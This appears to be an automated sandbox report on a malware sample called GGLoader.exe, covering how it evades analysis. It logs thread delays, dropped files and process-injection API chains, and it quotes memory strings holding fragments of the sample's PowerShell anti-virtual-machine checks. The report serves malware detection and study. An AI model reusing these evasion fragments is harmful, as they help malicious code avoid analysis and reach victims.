Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 42_2_00000001400010C0
Source: C:\Windows\System32\dllhost.exe Stalling execution: Execution stalls by calling Sleep
Source: GGLoader.exe Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\GGLoader.exe Memory allocated: 1810000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\GGLoader.exe Memory allocated: 1B4D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\GGLoader.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5689
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4077
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3192
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6279
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3473
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7014
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2652
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Window / User API: threadDelayed 1055
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4348
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 815
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5850
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1481
Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 881
Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 574
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 4509
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 5490
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 8996
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 946
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 4355
Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9875
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\LicenseGet.exe
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\poduiwcd.tmp
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\conhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dialer.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\winlogon.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\conhost.exe API coverage: 6.0 %
Source: C:\Windows\System32\conhost.exe API coverage: 6.0 %
Source: C:\Users\user\Desktop\GGLoader.exe TID: 7484 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776 Thread sleep count: 3399 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep count: 3192 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep count: 6279 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep count: 3473 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe TID: 7912 Thread sleep count: 1055 > 30
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe TID: 7912 Thread sleep time: -52750s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6032 Thread sleep count: 4348 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2648 Thread sleep count: 815 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3736 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6308 Thread sleep count: 5850 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6736 Thread sleep count: 1481 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 8148 Thread sleep count: 881 > 30
Source: C:\Windows\System32\dllhost.exe TID: 8148 Thread sleep time: -88100s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 8184 Thread sleep count: 574 > 30
Source: C:\Windows\System32\dllhost.exe TID: 8184 Thread sleep time: -57400s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 8 Thread sleep count: 4509 > 30
Source: C:\Windows\System32\winlogon.exe TID: 8 Thread sleep time: -4509000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 8 Thread sleep count: 5490 > 30
Source: C:\Windows\System32\winlogon.exe TID: 8 Thread sleep time: -5490000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5016 Thread sleep count: 8996 > 30
Source: C:\Windows\System32\lsass.exe TID: 5016 Thread sleep time: -8996000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5016 Thread sleep count: 946 > 30
Source: C:\Windows\System32\lsass.exe TID: 5016 Thread sleep time: -946000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8080 Thread sleep count: 4355 > 30
Source: C:\Windows\System32\svchost.exe TID: 8080 Thread sleep time: -4355000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 5052 Thread sleep count: 9875 > 30
Source: C:\Windows\System32\dwm.exe TID: 5052 Thread sleep time: -9875000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7476 Thread sleep count: 146 > 30
Source: C:\Windows\System32\svchost.exe TID: 7476 Thread sleep time: -146000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7540 Thread sleep count: 141 > 30
Source: C:\Windows\System32\svchost.exe TID: 7540 Thread sleep time: -141000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7512 Thread sleep count: 141 > 30
Source: C:\Windows\System32\svchost.exe TID: 7512 Thread sleep time: -141000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7532 Thread sleep count: 135 > 30
Source: C:\Windows\System32\svchost.exe TID: 7532 Thread sleep time: -135000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7484 Thread sleep count: 63 > 30
Source: C:\Windows\System32\svchost.exe TID: 7484 Thread sleep time: -63000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7496 Thread sleep count: 116 > 30
Source: C:\Windows\System32\svchost.exe TID: 7496 Thread sleep time: -116000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7640 Thread sleep count: 90 > 30
Source: C:\Windows\System32\svchost.exe TID: 7640 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1216 Thread sleep count: 80 > 30
Source: C:\Windows\System32\svchost.exe TID: 1216 Thread sleep time: -80000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2892 Thread sleep count: 84 > 30
Source: C:\Windows\System32\svchost.exe TID: 2892 Thread sleep time: -84000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5080 Thread sleep count: 84 > 30
Source: C:\Windows\System32\svchost.exe TID: 5080 Thread sleep time: -84000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7696 Thread sleep count: 81 > 30
Source: C:\Windows\System32\svchost.exe TID: 7696 Thread sleep time: -81000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe File opened: PhysicalDrive0
Source: C:\Users\user\Desktop\GGLoader.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\powercfg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00C0A1F1 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 35_2_00C0A1F1
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E59BE3C FindFirstFileExW, 39_2_000002505E59BE3C
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1BBE3C FindFirstFileExW, 41_2_000001C08C1BBE3C
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_000002131118BE3C FindFirstFileExW, 42_2_000002131118BE3C
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC64BE3C FindFirstFileExW, 43_2_00000225DC64BE3C
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00793B60 GetSystemInfo,GlobalMemoryStatusEx,CreateFileA,DeviceIoControl,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 6_2_00793B60
Source: C:\Users\user\Desktop\GGLoader.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000001.00000002.1967211454.000001EC48F35000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAE'
Source: svcupdater.exe, 00000023.00000002.2994296261.000000000116A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW{
Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000033.00000002.2990825628.000001845BC0A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svcupdater.exe, 00000023.00000002.2994296261.000000000113B000.00000004.00000020.00020000.00000000.sdmp, svcupdater.exe, 00000023.00000002.2994296261.000000000116A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.1767788945.000002511E4B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAdd-Type-AssemblyNameSystem.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('NoVirtualMachine/Serverisallowed!Tryrunningonadifferentdevice!','','OK','Error')<#wkk#>;j
Source: GGLoader.exe, 00000000.00000002.1714327459.000000000152B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: svchost.exe, 00000035.00000003.2350422690.000001D559C7F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000035.00000003.2355871811.000001D559386000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: GGLoader.exe Binary or memory string: CheckForVMwareAndVirtualBox
Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 0000002D.00000002.2957315131.000002A66062A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000035.00000002.3000604673.000001D559E88000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMCI: Using capabilities (0x1c).
Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: GGLoader.exe Binary or memory string: vmware
Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: powershell.exe, 00000003.00000002.1767742399.000002511CE80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAdd-Type-AssemblyNameSystem.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('NoVirtualMachine/Serverisallowed!Tryrunningonadifferentdevice!','','OK','Error')<#wkk#>;W6432=C:\Progr@L]
Source: svchost.exe, 00000035.00000002.2964974668.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000000.2294791024.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000003.00000002.1767408817.000002511CAF2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1767408817.000002511CAE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1790991366.0000025136E12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1789784483.0000025136BB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAdd-Type-AssemblyNameSystem.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('NoVirtualMachine/Serverisallowed!Tryrunningonadifferentdevice!','','OK','Error')<#wkk#>;
Source: svchost.exe, 00000035.00000003.2355871811.000001D559386000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 00000035.00000000.2296597019.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
Source: svchost.exe, 00000035.00000000.2296026118.000001D559020000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware
Source: svchost.exe, 00000035.00000003.2349769567.000001D5599A5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: GGLoader.exe, 00000000.00000002.1714327459.000000000152B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}2igv
Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: GGLoader.exe Binary or memory string: Form200Form210Form220Form230Form240Form250Form260Form270Form280Form290Form201Form211Form221Form231Form241Form251Form261Form271Form281Form291D1Form202Form212Form222Form232Form242Form252Form262Form272Form282Form292Form203Form213Form223Form233Form243Form253Form263Form273Form283Form293Form204Form214Form224Form234Form244Form254Form264Form274Form284Form294Form205Form215Form225Form235Form245Form255Form265Form275Form285Form295Form206Form216Form226Form236Form246Form256Form266Form276Form286Form296Form207Form217Form227Form237Form247Form257Form267Form277Form287Form297Form208Form218Form228Form238Form248Form258Form268Form278Form288Form298get_UTF8Form209Form219Form229Form239Form249Form259Form269Form279Form289Form299<Module>mscorlibThreadget_IsAttachedIsEmulatedNetGuardIDisposableget_HandleGetModuleHandleCloseHandleset_WindowStyleProcessWindowStyleset_FileNameDisposeBabelAttributeSuppressIldasmAttributeYanoAttributeDotfuscatorAttributeCompilationRelaxationsAttributeConfusedByAttributeRuntimeCompatibilityAttributeD1.exeSystem.ThreadingEncodingFromBase64StringToStringGetStringObfuscatedByGoliathAntiVMCheckAntiDebugCheckkernel32.dllget_ItemSystemMainManagementObjectCollectionExceptionProcessStartInfoZeroSleepDebuggerManagementObjectSearcherToLowerManagementObjectEnumeratorGetEnumerator.ctor.cctordotNetProtectorIntPtrSystem.DiagnosticsSystem.Runtime.CompilerServicesContainsGetCurrentProcessset_ArgumentsManagementBaseObjectGetop_ExplicitExitToUpperInvariantSystem.ManagementEnvironm